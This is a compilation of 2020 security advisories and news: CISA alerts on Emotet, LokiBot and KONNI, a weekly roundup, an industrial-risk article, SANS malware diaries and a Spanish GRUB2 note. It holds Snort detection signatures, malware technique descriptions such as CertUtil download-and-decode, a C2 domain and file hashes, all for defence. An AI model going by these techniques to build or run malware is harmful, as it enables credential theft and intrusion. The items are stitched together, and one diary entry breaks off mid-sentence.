alert tcp any any -> any $HTTP_PORTS (msg:”EMOTET:HTTP URI GET contains ‘/wp-content/###/'”; sid:00000000; rev:1; flow:established,to_server; content:”/wp-content/”; http_uri; content:”/”; http_uri; distance:0; within:4; content:”GET”; nocase; http_method; urilen:<17; classtype:http-uri; content:”Connection|3a 20|Keep-Alive|0d 0a|”; http_header; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:”EMOTET:HTTP URI GET contains ‘/wp-admin/###/'”; sid:00000000; rev:1; flow:established,to_server; content:”/wp-admin/”; http_uri; content:”/”; http_uri; distance:0; within:4; content:”GET”; nocase; http_method; urilen:<15; content:”Connection|3a 20|Keep-Alive|0d 0a|”; http_header; classtype:http-uri; metadata:service http;)

Mitigations

CISA and MS-ISAC recommend that network defenders—in federal, state, local, tribal, territorial governments, and the private sector—consider applying the following best practices to strengthen the security posture of their organization’s systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.

Block email attachments commonly associated with malware (e.g.,.dll and .exe).
Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).
Implement Group Policy Object and firewall rules.
Implement an antivirus program and a formalized patch management process.
Implement filters at the email gateway, and block suspicious IP addresses at the firewall.
Adhere to the principle of least privilege.
Implement a Domain-Based Message Authentication, Reporting & Conformance validation system.
Segment and segregate networks and functions.
Limit unnecessary lateral communications.
Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Enforce multi-factor authentication.
Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
Enable a firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to suspicious or risky sites.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
Scan all software downloaded from the internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate access control lists.
Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.
See CISA’s Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on addressing potential incidents and applying best practice incident response procedures.
See the joint CISA and MS-ISAC Ransomware Guide on how to be proactive and prevent ransomware attacks from happening and for a detailed approach on how to respond to an attack and best resolve the cyber incident.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Resources

MS-ISAC Security Event Primer – Emotet
CISA Alert TA18-201A – Emotet Malware
MITRE ATT&CK – Emotet
MITRE ATT&CK for Enterprise
References
[1] Bleeping Computer: Emotet Malware Strikes U.S. Businesses with COVID-19 Spam [2] IBID [3] Security Lab: Emotet Update Increases Downloads [4] Proofpoint: A Comprehensive Look at Emotet’s Summer 2020 Return [5] ZDNet: France, Japan, New Zealand Warn of Sudden Strike in Emotet Attacks [6] Bleeping Computer: France Warns of Emotet Attacking Companies, Administration [7] ESET: Emotet Strikes Quebec’s Department of Justice: An ESET Analysis [8] ZDNet: Microsoft, Italy, and the Netherlands Warn of Increased Emotet Activity [9] Bleeping Computer: Emotet Double Blunder: Fake ‘Windows 10 Mobile’ and Outdated Messages [10] Palo Alto Networks: Case Study: Emotet Thread Hijacking, an Email Attack Technique Revisions
October 6, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: October 1, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Defense (DOD) Cyber National Mission Force (CNMF) have identified a malware variant—referred to as SLOTHFULMEDIA—used by a sophisticated cyber actor. In addition, U.S. Cyber Command has released the malware sample to the malware aggregation tool and repository, VirusTotal.

CISA encourages users and administrators to review Malware Analysis Report MAR-10303705-1.v1 and U.S. Cyber Command’s VirusTotal page for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.

 

 

Read on:

 

Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands within a single file. Many users do this as part of a regular operational workload manipulating files, executing programs and printing text. However, as a shell interpreter is available in every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .

Original release date: September 22, 2020Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise frameworks for all referenced threat actor techniques.

This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions by the Multi-State Information Sharing & Analysis Center (MS-ISAC).

CISA has observed a notable increase in the use of LokiBot malware by malicious cyber actors since July 2020. Throughout this period, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected persistent malicious LokiBot activity. LokiBot uses a credential- and information-stealing malware, often sent as a malicious attachment and known for being simple, yet effective, making it an attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases.

Technical Details

LokiBot—also known as Lokibot, Loki PWS, and Loki-bot—employs Trojan malware to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials.

The malware steals credentials through the use of a keylogger to monitor browser and desktop activity (Credentials from Password Stores [T1555]).

(Credentials from Password Stores: Credentials from Web Browsers [T1555.003])
(Input Capture: Keylogging [T1056.001])

LokiBot can also create a backdoor into infected systems to allow an attacker to install additional payloads (Event Triggered Execution: Accessibility Features [T1546.008]).
Malicious cyber actors typically use LokiBot to target Windows and Android operating systems and distribute the malware via email, malicious websites, text, and other private messages (User Execution: Malicious File [T1204.002]). See figure 1 for enterprise techniques used by LokiBot.

Figure 1: MITRE ATT&CK enterprise techniques used by LokiBot

Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications, including the following.

February 2020: Trend Micro identified cyber actors using LokiBot to impersonate a launcher for Fortnite—a popular video game.[1] August 2019: FortiGuard SE researchers discovered a malspam campaign distributing LokiBot information-stealing payloads in spearphishing attack on a U.S. manufacturing company.[2] August 2019: Trend Micro researchers reported LokiBot malware source code being hidden in image files spread as attachments in phishing emails.[3] June 2019: Netskope uncovered LokiBot being distributed in a malspam campaign using ISO image file attachments.[4] April 2019: Netskope uncovered a phishing campaign using malicious email attachments with LokiBot malware to create backdoors onto infected Windows systems and steal sensitive information.[5] February 2018: Trend Micro discovered CVE-2017-11882 being exploited in an attack using Windows Installer service to deliver LokiBot malware.[6] October 2017: SfyLabs identified cyber actors using LokiBot as an Android banking trojan that turns into ransomware.[7] May 2017: Fortinet reported malicious actors using a PDF file to spread a new LokiBot variant capable of stealing credentials from more than 100 different software tools.[8] March 2017: Check Point discovered LokiBot malware found pre-installed on Android devices.[9] December 2016: Dr.Web researchers identified a new LokiBot variant targeting Android core libraries.[10] February 2016: Researchers discovered the LokiBot Android Trojan infecting the core Android operating system processes.[11] MITRE ATT&CK Techniques

According to MITRE, LokiBot uses the ATT&CK techniques listed in table 1.

Table 1: LokiBot ATT&CK techniques

Technique

Use

System Network Configuration Discovery [T1016]

LokiBot has the ability to discover the domain name of the infected host.

Obfuscated Files or Information [T1027]

LokiBot has obfuscated strings with base64 encoding.

Obfuscated Files or Information: Software Packing [T1027.002]

LokiBot has used several packing methods for obfuscation.

System Owner/User Discovery [T1033]

LokiBot has the ability to discover the username on the infected host.

Exfiltration Over C2 Channel [T1041]

LokiBot has the ability to initiate contact with command and control to exfiltrate stolen data.

Process Injection: Process Hollowing [T1055.012]

LokiBot has used process hollowing to inject into legitimate Windows process vbc.exe.

Input Capture: Keylogging [T1056.001]

LokiBot has the ability to capture input on the compromised host via keylogging.

Application Layer Protocol: Web Protocols [T1071.001]

LokiBot has used Hypertext Transfer Protocol for command and control.

System Information Discovery [T1082]

LokiBot has the ability to discover the computer name and Windows product name/version.

User Execution: Malicious File [T1204.002]

LokiBot has been executed through malicious documents contained in spearphishing emails.

Credentials from Password Stores [T1555]

LokiBot has stolen credentials from multiple applications and data sources including Windows operating system credentials, email clients, File Transfer Protocol, and Secure File Transfer Protocol clients.

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

LokiBot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and Chromium and Mozilla Firefox-based web browsers.

Hide Artifacts: Hidden Files and Directories [T1564.001]

LokiBot has the ability to copy itself to a hidden file and directory.

Detection

Signatures

CISA developed the following Snort signature for use in detecting network activity associated with LokiBot activity.

alert tcp any any -> any $HTTP_PORTS (msg:”Lokibot:HTTP URI POST contains ‘/*/fre.php’ post-infection”; flow:established,to_server; flowbits:isnotset,.tagged; content:”/fre.php”; http_uri; fast_pattern:only; urilen:<50,norm; content:”POST”; nocase; http_method; pcre:”//(?:alien|lokyd|donep|jemp|lokey|new2|loki|Charles|sev7n|dbwork|scroll/NW|wrk|job|fived?|donemy|animationdkc|love|Masky|vd|lifetn|Ben)/fre.php$/iU”; flowbits:set,.tagged;classtype:http-uri; metadata:service http; metadata:pattern HTTP-P001,)

Mitigations

CISA and MS-ISAC recommend that federal, state, local, tribal, territorial government, private sector users, and network administrators consider applying the following best practices to strengthen the security posture of their organization’s systems. System owners and administrators should review any configuration changes prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines. See Protecting Against Malicious Code.
Keep operating system patches up to date. See Understanding Patches and Software Updates.
Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Enforce multi-factor authentication. See Supplementing Passwords for more information.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.
Enforce a strong password policy. See Choosing and Protecting Passwords.
Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
Scan all software downloaded from the internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate access control lists.
Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Resources

Center for Internet Security Security Event Primer – Malware: https://www.cisecurity.org/white-papers/security-event-primer-malware/
MITRE ATT&CK – LokiBot: https://attack.mitre.org/software/S0447/
MITRE ATT&CK for Enterprise: https://attack.mitre.org/matrices/enterprise/

References
[1] Trend Micro: LokiBot Impersonates Popular Game Launcher and Drops Compiled C# Code File [2] Fortinet: Newly Discovered Infostealer Attack Uses LokiBot [3] ZDNet: LokiBot Malware Now Hides its Source Code in Image Files [4] SecurityWeek: LokiBot and NanoCore Malware Distributed in ISO Image Files [5] Netskope: LokiBot & NanoCore being distributed via ISO disk image files [6] Trend Micro: Attack Using Windows Installer Leads to LokiBot [7] BleepingComputer: LokiBot Android Banking Trojan Turns Into Ransomware When You Try to Remove It [8] Fortinet: New Loki Variant Being Spread via PDF File [9] Check Point: Preinstalled Malware Targeting Mobile Users [10] BleepingComputer: Loki Trojan Infects Android Libraries and System Process to Get Root Privileges [11] New Jersey Cybersecurity & Communications Integration Cell: LokiBot  Revisions
September 22, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

fed-up-person-laptop.jpg

Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Gartner predicts the financial impact of cyber attacks resulting in fatal casualties will reach more than US$50 billion by 2023
As more physical industrial sites become connected, leaders themselves will be accountable for their security and safety 

In the age of Industry 4.0 and connected industry, we often discuss the relatively new and growing threat of cyber attacks in the context of financial damage. Ransomware, for example, can jam a steel crowbar into operations, leading to downtime, and subsequently hemorrhaging costs. 

As physical industries become connected and therefore vulnerable to attacks, they face the same risks as every other digital organization. 

READ NEXTIIoT smart factories are leaving doors open for cyber attacks

But that’s not quite the extent of it. As warehouses, factories, power plants, and other physical facilities are further laden with sensor-based predictive analytics, remote access technologies, control networks, robotics, and other operational technology (OT), system attacks can quickly lead to physical harm to people, destruction of property or environmental disasters.

Previous malware attacks have demonstrated this potential. The Triton malware was found infecting safety systems in Saudi petrochemical plants in 2017. It gave attackers the ability to remotely shut off fail-safe systems in case there was a poisonous-gas leak or a critical failure — the last layer of defense before human life was at risk. 

There have been spear-phishing attacks on members of the US energy sector. Allegedly determined to be North Korean hackers, attempts have been thwarted but could easily have led to attacks that could devastate the infrastructure of the country. As far back as 2015, a hack of Ukraine’s power grid caused a blackout affecting 200,000 people, while Kaspersky Labs estimates that over 40% of ICS computers on its watch had been attacked by malicious malware at least once in the first half of 2018. 

In the same year, it was reported that the hacking of a control system for a steel mill in Germany meant a blast furnace could not be shut, leading to “massive” damage to the plant, but no reported loss of life. 

These types of incidents on cyber-physical security (CPS) are fortunately rare but set to rapidly increase in the coming years due to a lack of security focus and spending. If business leaders don’t act, they could be held personally accountable when something goes wrong. 

Industrial robots are welding metal part in factory

Industrial robots are welding metal part in factory. Source: Shutterstock

The cyber-physical security threat

Gartner defines CPS as systems engineered to orchestrate sensing, computation, control, networking, and analytics to interact with the physical world — including humans. 

They underpin all connected IT, operational technology (OT), and Internet of Things (IoT) efforts where security considerations span both the cyber and physical worlds, such as asset-intensive, critical infrastructure, and clinical healthcare environments.

Gartner predicts that as this type of threat increases, business leaders will be caught off guard as liability for CPS incidents will “pierce the corporate veil” to personal liability for 75% of CEOs by 2024.

“Soon, CEOs won’t be able to plead ignorance or retreat behind insurance policies,” said Katell Thielemann, research vice president at Gartner. “Regulators and governments will react promptly to an increase in serious incidents resulting from failure to secure CPSs, drastically increasing rules and regulations governing them.

“In the U.S., the FBI, NSA and Cybersecurity and Infrastructure Security Agency (CISA) have already increased the frequency and details provided around threats to critical infrastructure-related systems, most of which are owned by private industry.”

Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach more than US$50 billion by 2023. The firm warns that, even with the actual value of human life in the equation, associated costs for organizations in terms of compensation, litigation, insurance, regulatory fines, and reputation loss will be significant. 

“Technology leaders need to help CEOs understand the risks that CPSs represent and the need to dedicate focus and budget to securing them,” said Thielemann. “The more connected CPSs are, the higher the likelihood of an incident occurring.”

YOU MIGHT LIKE

IOT

IIoT smart factories are leaving doors open for cyber attacks

With OT, smart buildings, smart cities, connected cars, and autonomous vehicles evolving, incidents in the digital world will have a much greater effect in the physical world as risks, threats and vulnerabilities now exist in a bidirectional, cyber-physical spectrum.

However, many enterprises are not aware of CPSs already deployed in their organization, either due to legacy systems connected to enterprise networks by teams outside of IT or because of new business-driven automation and modernization efforts.

The post CEOs will be held accountable for ‘killer’ malware in future, says Gartner appeared first on TechHQ.

large.png

During the weekend, I found several samples from the same VBA macro. The only difference between all the samples was the URL to fetch a malicious PE file. I have a specific YARA rule to search for embedded PowerShell strings and my rule fired several times with the same pattern and similar size. Here is the pattern:

cccs-banner.png

Original release date: August 14, 2020Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.

Technical Details

KONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code (Phishing: Spearphising Attachment [T1566.001]). The malicious code can change the font color from light grey to black (to fool the user to enable content), check if the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files (Command and Scripting Interpreter: Windows Command Shell [T1059.003]).

Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection.

The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.

MITRE ATT&CK Techniques

According to MITRE, KONNI uses the ATT&CK techniques listed in table 1.

Table 1: KONNI ATT&CK techniques

Technique
Use

System Network Configuration Discovery [T1016]

KONNI can collect the Internet Protocol address from the victim’s machine.

System Owner/User Discovery [T1033]

KONNI can collect the username from the victim’s machine.

Masquerading: Match Legitimate Name or Location [T1036.005]

KONNI creates a shortcut called Anti virus service.lnk in an apparent attempt to masquerade as a legitimate file.

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [T1048.003]

KONNI has used File Transfer Protocol to exfiltrate reconnaissance data out.

Input Capture: Keylogging  [T1056.001]

KONNI has the capability to perform keylogging.

Process Discovery [T1057]

KONNI has used tasklist.exe to get a snapshot of the current processes’ state of the target machine.

Command and Scripting Interpreter: PowerShell [T1059.001]

KONNI used PowerShell to download and execute a specific 64-bit version of the malware.

Command and Scripting Interpreter: Windows Command Shell  [T1059.003]

KONNI has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection change.

Indicator Removal on Host: File Deletion [T1070.004]

KONNI can delete files.

Application Layer Protocol: Web Protocols [T1071.001]

KONNI has used Hypertext Transfer Protocol for command and control.

System Information Discovery [T1082]

KONNI can gather the operating system version, architecture information, connected drives, hostname, and computer name from the victim’s machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.

File and Directory Discovery [T1083]

A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.

Ingress Tool Transfer [T1105]

KONNI can download files and execute them on the victim’s machine.

Modify Registry [T1112]

KONNI has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence.

Screen Capture [T1113]

KONNI can take screenshots of the victim’s machine.

Clipboard Data [T1115]

KONNI had a feature to steal data from the clipboard.

Data Encoding: Standard Encoding [T1132.001]

KONNI has used a custom base64 key to encode stolen data before exfiltration.

Access Token Manipulation: Create Process with Token [T1134.002]

KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.

Deobfuscate/Decode Files or Information [T1140]

KONNI has used CertUtil to download and decode base64 encoded strings.

Signed Binary Proxy Execution: Rundll32 [T1218.011]

KONNI has used Rundll32 to execute its loader for privilege escalation purposes.

Event Triggered Execution: Component Object Model Hijacking [T1546.015]

KONNI has modified ComSysApp service to load the malicious DLL payload.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]

A version of KONNI drops a Windows shortcut into the Startup folder to establish persistence.

Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]

A version of KONNI drops a Windows shortcut on the victim’s machine to establish persistence.

Abuse Elevation Control Mechanism: Bypass User Access Control [T1548.002]

KONNI bypassed User Account Control with the “AlwaysNotify” settings.

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera.

Detection

Signatures

CISA developed the following Snort signatures for use in detecting KONNI malware exploits.

alert tcp any any -> any $HTTP_PORTS (msg:”HTTP URI contains ‘/weget/*.php’ (KONNI)”; sid:1; rev:1; flow:established,to_server; content:”/weget/”; http_uri; depth:7; offset:0; fast_pattern; content:”.php”; http_uri; distance:0; within:12; content:!”Referrer|3a 20|”; http_header; classtype:http-uri; priority:2; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:”KONNI:HTTP header contains ‘User-Agent|3a 20|HTTP|0d 0a|'”; sid:1; rev:1; flow:established,to_server; content:”User-Agent|3a 20|HTTP|0d 0a|”; http_header; fast_pattern:only; content:”POST”; nocase; http_method; classtype:http-header; priority:2; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:”KONNI:HTTP URI contains ‘/weget/(upload|uploadtm|download)'”; sid:1; rev:1; flow:established,to_server; content:”/weget/”; http_uri; fast_pattern:only; pcre:”/^/wegetx2f(?:upload|uploadtm|download).php/iU”; content:”POST”; http_method; classtype:http-uri; priority:2; reference:url,blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html; metadata:service http;)

Mitigations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines. See Protecting Against Malicious Code.
Keep operating system patches up to date. See Understanding Patches and Software Updates.
Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.
Enforce a strong password policy. See Choosing and Protecting Passwords.
Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
 Scan all software downloaded from the internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate access control lists.
Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, “Guide to Malware Incident Prevention and Handling for Desktops and Laptops.”

Resources

d-hunter – A Look Into KONNI 2019 Campaign
MITRE ATT&CK – KONNI
MITRE ATT&CK for Enterprise
Revisions
August 14, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

One of our readers, Lukas, shared an unusual malicious executable with us earlier this week – one that was 130 MB in size. Making executables extremely large is not an uncommon technique among malware authors[1], as it allows them to easily avoid detection by most AV solutions, since the size of files which AVs will check is usually fairly low (tens of megabytes at most). In order to increase the size of their creations, malware authors commonly embed images in the executables or include large chunks of “empty space” (i.e. null bytes) in them.

Authors of our executable, which turned out to be a Visual Basic .NET application originally called cvcv.exe, decided to use both techniques. They embedded 54 GIFs (or rather one GIF, which you may see bellow, with a healthy 1.12 MB size 54 times) among resources of the application and added more than 75 MB of null bytes after the end of the executable.

If all of this unnecessarily filled space was freed, the 130 MB executable would be just over 260 kB in size. The story doesn’t end there though.

.NET malware can sometimes be quite unpleasant and difficult to analyze, but after a while, it became clear that our executable only used elementary name obfuscation so it wasn’t too hard to get to the bottom of what it was supposed to do. The entire massive file turned out to be a simple injector for a second stage payload – another VB .NET executable, originally called j.exe, with a much smaller size of 24 kB.

This second executable was embedded (in an encrypted form) as another resource in the original EXE. After the massive application was executed, it would wait for 35 seconds, decrypt the second executable/payload using a simple XOR-based algorithm and then launch it.

The smaller executable turned out to surprisingly be a bit more complex then the large one. After it was executed, it would first ensure that the malware remained persistent. Doubly – it would copy the original massive file to the Start Menu Startup folder as “77e41643eabac0c55a13f8b8e793e845.exe” and to the AppData folder as “jossej.exe”. It would also create a new value in registry (HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun) which would ensure that the latter file was executed at startup as well. It would then run the jossej executable which would reconfigure internet security zones and add an allow rule for itself to the Windows firewall.

The malicious process would then try to contact a server at the (DDNS) domain lexy[.]hopto[.]org.

The domain was inaccessible by the time of the analysis, so we can’t be completely sure what communication would follow. Going by the contents of the executable however, it would seem that the malware is supposed to function mainly as an infostealer/keylogger.

This would more or less agree with the results for the sample on Virus Total, as according to it, most AVs seem to detect the file as a version of Razy Trojan[2].

The following chart shows a summary of the main activities performed by the malware. As we may see, it is nowhere near as complex as it could have been for a 130 MB executable.

 

Indicators of Compromise (IoCs)

cvcv.exe / jossej.exe / 77e41643eabac0c55a13f8b8e793e845.exe (130 MB)
MD5 – f1c3d28ebaf180367591fa5d31e3febf
SHA1 – b1cfa019684fcd293eeca557aa523312837ea37d

j.exe (24 kB)
MD5 – 9690a3f2a3d0f84244d41e4aefae0a16
SHA1 – 4631ba4467eee1380f0e847c4f56dddbaed7196c

 

[1] https://isc.sans.edu/forums/diary/Picks+of+2019+malware+the+large+the+small+and+the+one+full+of+null+bytes/25718/
[2] https://www.virustotal.com/gui/file/5bf3830d0da0283fcdc2ab8183ab280458ab3638d1cae64a2b758208b77c52fa/detection

———–
Jan Kopriva@jk0prAlef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Original release date: August 13, 2020

The National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) have released a cybersecurity advisory introducing previously undisclosed Russian malware. NSA and the FBI attributed the malware, dubbed Drovorub, to Russian advanced persistent threat (APT) actors.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the joint advisory and employ its detection techniques and mitigations.

This product is provided subject to this Notification and this Privacy & Use policy.

Una severa vulnerabilidad existe en casi todas las versiones firmadas de GRUB2, el cual es usado por la mayoría de los sistemas Linux. De explotarse adecuadamente, permitiría a los atacantes comprometer el proceso de arranque del sistema, incluso si el mecanismo de verificación «Secure Boot» está activo.

La falla fue reportada por Eclypsium el 29 de julio aunque el CVE-2020-10713 asociado tiene fecha del 20 de marzo, y si bien grub2 podría relacionarse más directamente con sistemas Linux, los equipos con arranque dual (o múltiple) abre la puerta a la explotación hacia otros sistemas como Windows.

